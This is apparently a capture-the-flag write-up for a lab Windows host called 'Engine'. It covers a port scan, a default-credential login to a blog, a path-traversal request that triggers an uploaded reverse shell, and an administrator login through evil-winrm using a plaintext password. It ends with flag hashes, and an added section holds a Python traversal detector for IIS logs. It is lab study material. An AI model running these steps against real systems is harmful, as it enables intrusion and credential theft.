Info

  • Name – Engine
  • IP Address – 172.31.1.16

Enumeration

Open Ports

Port   Protocol  State     Service        Version
53     udp       filtered  domain
67     udp       filtered  dhcps
68     udp       filtered  dhcpc
69     udp       filtered  tftp
80     tcp       open      http           Microsoft IIS httpd 8.5
123    udp       filtered  ntp
135    tcp       open      msrpc          Microsoft Windows RPC
135    udp       filtered  msrpc
137    udp       open      netbios-ns     Microsoft Windows netbios-ns
138    udp       filtered  netbios-dgm
139    tcp       open      netbios-ssn    Microsoft Windows netbios-ssn
139    udp       filtered  netbios-ssn
161    udp       filtered  snmp
162    udp       filtered  snmptrap
445    tcp       open      microsoft-ds   Microsoft Windows Server 2008 R2 – 2012 microsoft-ds
445    udp       filtered  microsoft-ds
500    udp       filtered  isakmp
514    udp       filtered  syslog
520    udp       filtered  route
631    udp       filtered  ipp
1434   udp       filtered  ms-sql-m
1900   udp       filtered  upnp
3389   tcp       open      ms-wbt-server
4500   udp       filtered  nat-t-ike
5985   tcp       open      http           Microsoft HTTPAPI httpd 2.0
49152  udp       filtered  unknown
49154  tcp       open      msrpc          Microsoft Windows RPC
49155  tcp       open      msrpc          Microsoft Windows RPC
49164  tcp       open      msrpc          Microsoft Windows RPC

Exploitation

Exploit Details (SearchSploit)

Log in to the blog with the default credentials admin / admin, then open the content menu and select a post to enter edit mode. Click the file button.

Upload the code from the exploit after substituting the correct IP address / port values.

Initiate the reverse shell.

curl 'http://172.31.1.16/blog//?theme=../../App_Data/files'
whoami
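From the defender's side, the request above leaves a clear trace in the IIS W3C log: a theme parameter carrying "../" into App_Data. The following is an added example, not part of the original writeup, that scans constructed IIS-style log lines for directory traversal in any query parameter, including percent-encoded and double-encoded forms; the log format (date time c-ip cs-method cs-uri-stem cs-uri-query sc-status) and the sample lines are assumptions.

```python
import re
from urllib.parse import unquote, parse_qsl

# Constructed IIS W3C-style log lines (date time c-ip cs-method cs-uri-stem cs-uri-query sc-status).
# These are sample data written for this example, not log lines from the target.
SAMPLE_LOG = """\
2024-01-01 10:00:01 10.0.0.5 GET /blog/ theme=default 200
2024-01-01 10:00:07 10.0.0.9 GET /blog// theme=../../App_Data/files 200
2024-01-01 10:00:09 10.0.0.9 GET /blog/ theme=..%2F..%2FApp_Data%2Ffiles 200
2024-01-01 10:00:12 10.0.0.5 POST /blog/admin/files.cshtml - 302
"""

# A ".." path segment bounded by a separator (or the string edge) on both sides.
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")

def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so double-encoded forms like %252e%252e%252f are caught."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_traversal(line):
    """Return (client_ip, param_name, decoded_value) for the first traversal hit in the
    query string of one log line, or None if the line is clean or malformed."""
    fields = line.split()
    if len(fields) < 7:
        return None
    client_ip, query = fields[2], fields[5]
    if query == "-":  # IIS writes "-" when there is no query string
        return None
    # parse_qsl already percent-decodes once; decode_fully handles nested encoding.
    for name, raw in parse_qsl(query, keep_blank_values=True):
        value = decode_fully(raw).replace("\\", "/")  # normalise Windows separators
        if TRAVERSAL.search(value):
            return (client_ip, name, value)
    return None

def scan_log(text):
    """Run find_traversal over every line and collect the hits."""
    return [hit for hit in (find_traversal(line) for line in text.splitlines()) if hit]

if __name__ == "__main__":
    for client_ip, name, value in scan_log(SAMPLE_LOG):
        print(f"traversal from {client_ip}: {name}={value}")
```

The same check can run as a scheduled job over the IIS log directory, and hits on parameters that name a path under App_Data deserve the highest priority because that folder is not meant to be browsable.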

Privilege Escalation

Exploit Details (Found Credentials)

  • Name – Found Credentials
  • CVE – N/A
  • Module – N/A
  • Disclosed – N/A
  • References – N/A

winPEAS shows saved credentials for the administrator account.

evil-winrm -i $ip -u administrator -p PzCEKhvj6gQMk7kA
whoami
type C:\Users\alex\Desktop\access.txt
type ..\Desktop\system.txt

Loot

access.txt - 150688cfd5d47037eda7a9bb589c8743
system.txt - d345d4ac0d810fcfb63b8be2b7e3bb71